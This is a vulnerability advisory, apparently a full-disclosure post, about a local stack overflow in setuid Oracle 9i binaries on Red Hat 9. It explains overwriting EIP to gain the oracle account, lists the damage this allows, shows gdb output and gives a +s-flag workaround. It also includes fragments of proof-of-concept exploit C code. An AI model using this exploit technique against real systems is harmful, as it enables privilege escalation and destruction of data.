Oracle 9i installed onto a Redhat 9 x86 node with the latest Oracle patch kit has a generic stack based buffer overflow.
By passing a large argv[1] input string one is able to overwrite the EIP register with user controlled data, resulting in a segmentation fault that can be controlled to allow the execution of arbitrary code.
with Release 2 Patch Set 3 Version 9.2.0.4.0 for Linux.
These binaries become vulnerable to attack because they are made or get set with a +s flag. This allows users other than `oracle` to attach to restricted sections of the database, memory segments ....
All we need to do is create a shellcode that will setreuid of the oracle userID on the vulnerable system, yielding oracle user to the world.
By exploiting this basic bug, one is presented with the following options:
1) trojan oracle binaries 2) delete key database files 3) corrupt or modify data 4) shutdown abort the database 5) anything else oracle user can do
AIX architecture has also been tested and seems to be vulnerable to the same attack, I guess that probably every other arch is too.
If you run oracle as root (don't know why you would do such a thing) then you will loose your server, loosing your database is not so bad??
#0 0x41414141 in ?? () (gdb) i r eax 0x1d16 7446 ecx 0xbfffb5a8 -1073760856 edx 0x41414141 1094795585 ebx 0x41414141 1094795585 esp 0x41414141 0x41414141 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141 eflags 0x10202 66050 cs 0x23 35 ....
A quick work around for this would be to remove [+s] flag. This will stop anyone being able to gain `oracle` access to the database via this advised method.
Since the clearcase abuse information was not posted on all forums, I thought I would share this Oracle candy that I mentioned in that advisory. Here it is, c0ntex is still not full of hot air or false claims, this stuff is true man.
Ok, no more jokes, I will not tease people with information about bugs without posting code to go with it. So I will not mention the issues with php, rlogin, default apache2 install and .. oops, I will not mention them until I am willing to share code. Relax fella..! =|
Oracle informed over a month ago, got back to me very quickly but have heard nowt since, he who delays is a shepards delight... If you get owned, blame them!
printf("[-] %s\n", VERSION); printf("[-] -------------------------------------------------------\n" "[-] An offset value from 1750 - 3500 should work perfectly\n" "[-] if this does not nail it first time.\n" "[-] -------------------------------------------------------\n" "[-] Execute this PoC and attach ltrace with -o to a file so\n" "[-] you can grep for the goodness - c0ntex@hushmail.com\n" "[-] http://twistedminds.mine.nu/files/oracle_ownage.c\n" "[-] -------------------------------------------------------\n" "[-] gcc -Wall -o oracle_owned oracle_owned.c\n" "[-] Usage: %s offset_value\n", argv[0x00]);
for(i = 0x00; i < SMASHIT; i += 0x04) *(long *) &Bucket[i] = badd_addr;
